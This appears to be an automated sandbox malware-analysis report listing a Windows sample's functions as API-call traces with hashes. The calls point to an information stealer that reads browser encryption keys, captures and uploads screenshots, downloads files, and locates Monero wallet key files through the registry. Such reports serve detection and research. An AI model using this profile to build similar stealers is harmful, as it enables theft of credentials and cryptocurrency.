Opcode Fuzzy Hash: 82019c1e39bd8a8fc46ff597a5d9656a8975ba9034d8f3f1ee0039cf035797f1
Instruction Fuzzy Hash: 1BB12A75905119ABCF60EF54EC89ADA77B8FF24300F0101E6E59AA7262EB709F94DF40

Function 0009580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00095845
_memset.LIBCMT ref: 00095856

Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00095881
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0009589F
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000958B3
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000958C6

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091D92: GetFileAttributesA.KERNEL32(?,?,?,0008DA7F,?,?,?), ref: 00091D99

Part of subcall function 0008819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0008CC90,?,?), ref: 000881E5

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

Part of subcall function 000921E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0009595C,?), ref: 000921F2

StrStrA.SHLWAPI(00000000), ref: 0009596A
GlobalFree.KERNEL32(?), ref: 00095A8C

Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088060
Part of subcall function 00088048: LocalAlloc.KERNEL32(00000040,?,?,?,00086724,?), ref: 0008806E
Part of subcall function 00088048: CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088084
Part of subcall function 00088048: LocalFree.KERNEL32(?,?,?,00086724,?), ref: 00088093

lstrcatA.KERNEL32(?,00000000), ref: 00095A18
StrCmpCA.SHLWAPI(?,000B6645), ref: 00095A35
lstrcatA.KERNEL32(?,?), ref: 00095A54
lstrcatA.KERNEL32(?,000B6A8C), ref: 00095A65

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: 39602dee87dd1459888b21e971f632c792da8febecaa788310d5259699df8819
Instruction ID: 3ad54a10feadf09111ef566f0c7beabb4644bf2c0a848f9826ce28d2cd78611f
Opcode Fuzzy Hash: 39602dee87dd1459888b21e971f632c792da8febecaa788310d5259699df8819
Instruction Fuzzy Hash: C6714EB1C4012D9FDF60EF60DC45AC9B7BABF88310F0405E6E508A3251EA329FA59F51

Function 00091F55 Relevance: 18.1, APIs: 12, Instructions: 147COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00091F96
GetDesktopWindow.USER32 ref: 00091FA4
GetWindowRect.USER32(00000000,?), ref: 00091FB1
SelectObject.GDI32(?,00000000), ref: 00091FDE
GetHGlobalFromStream.COMBASE(?,?), ref: 00092049
GlobalLock.KERNEL32(?), ref: 00092052
GlobalSize.KERNEL32(?), ref: 0009205E

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00085482: lstrlenA.KERNEL32(?), ref: 00085519
Part of subcall function 00085482: StrCmpCA.SHLWAPI(?,000B6986,000B697B,000B697A,000B696F), ref: 00085588
Part of subcall function 00085482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000855AA

SelectObject.GDI32(?,?), ref: 000920BC
DeleteObject.GDI32(?), ref: 000920D7
DeleteObject.GDI32(?), ref: 000920E0
ReleaseDC.USER32(00000000,00000000), ref: 000920E8
CloseWindow.USER32(00000000), ref: 000920EF

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 1802806997-0
Opcode ID: a4b2087bed1c5bbdc4127d51c8a11d3b37b95f1279f4971cb3204f6755fb5f22
Instruction ID: b26a69ffa1910382516df23a2942b14d340dbad79a04e9e7bfd1d56e8363d10f
Opcode Fuzzy Hash: a4b2087bed1c5bbdc4127d51c8a11d3b37b95f1279f4971cb3204f6755fb5f22
Instruction Fuzzy Hash: FE51EE72C01118AFDF11AFA0ED4D9EEBBB9EF48354B124126F901A6121EB309D15EBA1

Function 000A8B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 000A8B2D

Part of subcall function 000A4074: Sleep.KERNEL32(00000000,?), ref: 000A409C

__calloc_crt.LIBCMT ref: 000A8B51
_free.LIBCMT ref: 000A8B5F
__calloc_crt.LIBCMT ref: 000A8B6D
_free.LIBCMT ref: 000A8B7D
_free.LIBCMT ref: 000A8B83
__copytlocinfo_nolock.LIBCMT ref: 000A8B92
__setlocale_nolock.LIBCMT ref: 000A8B9F
_free.LIBCMT ref: 000A8BB8
__setmbcp_nolock.LIBCMT ref: 000A8BCA
_free.LIBCMT ref: 000A8BD8
_free.LIBCMT ref: 000A8BEC

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 4c2c807ead96ce20ed740bcce35c77229347cc6c8b6896d5578e28fcac80adbd
Instruction ID: 8520690e96d32ab421c3587ddb1fffb5b4f6770b9b4e0caec4824c67cb1360b0
Opcode Fuzzy Hash: 4c2c807ead96ce20ed740bcce35c77229347cc6c8b6896d5578e28fcac80adbd
Instruction Fuzzy Hash: 6221E275104A01EBDB317FA5D802D8AB7E4EF93760B20C42AF58556163EF329C00EB65

Function 000815E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 000815BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 000815C6
Part of subcall function 000815BC: HeapAlloc.KERNEL32(00000000), ref: 000815CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00081606
GetLastError.KERNEL32 ref: 0008160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00081614
GetWindowContextHelpId.USER32(00000000), ref: 0008161B
GetWindowLongW.USER32(00000000,00000000), ref: 00081623
RegisterClassW.USER32(00000000), ref: 0008162A
IsWindowVisible.USER32(00000000), ref: 00081631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00081638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081644
IsDialogMessageW.USER32(00000000,00000000), ref: 0008164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00081656
HeapFree.KERNEL32(00000000), ref: 0008165D

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 169633fbd6eb47e4b9e5f793aa71e4fdcd05b2e15238dfde7b5bf40bf0af4bc7
Instruction ID: 0627677a0cc3f2626e83b10fd5c90c13b1288b50ed3db5f4fad64373c2cfb1f3
Opcode Fuzzy Hash: 169633fbd6eb47e4b9e5f793aa71e4fdcd05b2e15238dfde7b5bf40bf0af4bc7
Instruction Fuzzy Hash: E9014672412824FBE7157BA1AD4DDDF3E6CFF4A352B040205F60A910218B7C9606CBFA

Function 000867ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00086836
StrCmpCA.SHLWAPI(?), ref: 00086856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00086877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00086892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000868C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 000868F8
CloseHandle.KERNEL32(?), ref: 00086923
InternetCloseHandle.WININET(00000000), ref: 0008692A
InternetCloseHandle.WININET(?), ref: 00086936

Strings

<+, xrefs: 00086954

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+
API String ID: 2507841554-3718021163
Opcode ID: 416a595fae62bde833fd3c2ae0abfb945a0c261d2881029739c5d64c1dc7c759
Instruction ID: fbe41f2fe4e8a32b43aa4037ddc5f5bc9e2551a19cfddd8086ecab1442e6bc6b
Opcode Fuzzy Hash: 416a595fae62bde833fd3c2ae0abfb945a0c261d2881029739c5d64c1dc7c759
Instruction Fuzzy Hash: 37414FB190112CABDF70AF20ED49BDA7BB8FF04314F1101A6FB49A6152DA319E85CF65

Function 0009B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0009B9C5
GetFileSize.KERNEL32(?,00000000), ref: 0009BA3E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0009BA5A
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0009BA6E
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0009BA77
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0009BA87
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0009BAA5
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0009BAB5

Strings

, xrefs: 0009BA11

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 0f982006ccfb2fef5e37ab9d172e5199cdacf485ef584d63e3922a1b81126b2c
Instruction ID: e50eee7332fce6ae2dc40e6810b4cec22b66da3852e274cee94381e32366c1d9
Opcode Fuzzy Hash: 0f982006ccfb2fef5e37ab9d172e5199cdacf485ef584d63e3922a1b81126b2c
Instruction Fuzzy Hash: 7B5101B1D0021CAFEF28DF99E985AAEBBF8EB44310F10442AE511A6260E7749D45DF11

Function 0008DB7F Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0008DBBB
strchr.MSVCRT ref: 0008DBCD
strchr.MSVCRT ref: 0008DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0008DCF7), ref: 0008DC14
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008DC21
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0008DCF7), ref: 0008DC28
strcpy_s.MSVCRT ref: 0008DC6F

Strings

`Tu, xrefs: 0008DBAA
0123456789ABCDEF, xrefs: 0008DB99

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF$`Tu
API String ID: 453150750-1497512213
Opcode ID: 18b5fcea0e37c1be7e5cf26a317d5fab8162565e97fc28719c12e8f24c491c39
Instruction ID: faea2c554b5037471055881a8085c48b4c8de5c6ebf91863757975f97670b885
Opcode Fuzzy Hash: 18b5fcea0e37c1be7e5cf26a317d5fab8162565e97fc28719c12e8f24c491c39
Instruction Fuzzy Hash: 6D314E719002199FDF00EFE8DC49ADEBBB5AF48355F110229E941FB281DB75A905CB90

Function 00081AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00081ADC

Part of subcall function 00081A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00081A65
Part of subcall function 00081A51: HeapAlloc.KERNEL32(00000000), ref: 00081A6C
Part of subcall function 00081A51: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00081AE9), ref: 00081A89
Part of subcall function 00081A51: RegQueryValueExA.ADVAPI32(00081AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00081AA4
Part of subcall function 00081A51: RegCloseKey.ADVAPI32(00081AE9), ref: 00081AAD

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00081AF1
lstrlenA.KERNEL32(?), ref: 00081AFE
lstrcatA.KERNEL32(?,.keys), ref: 00081B19

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

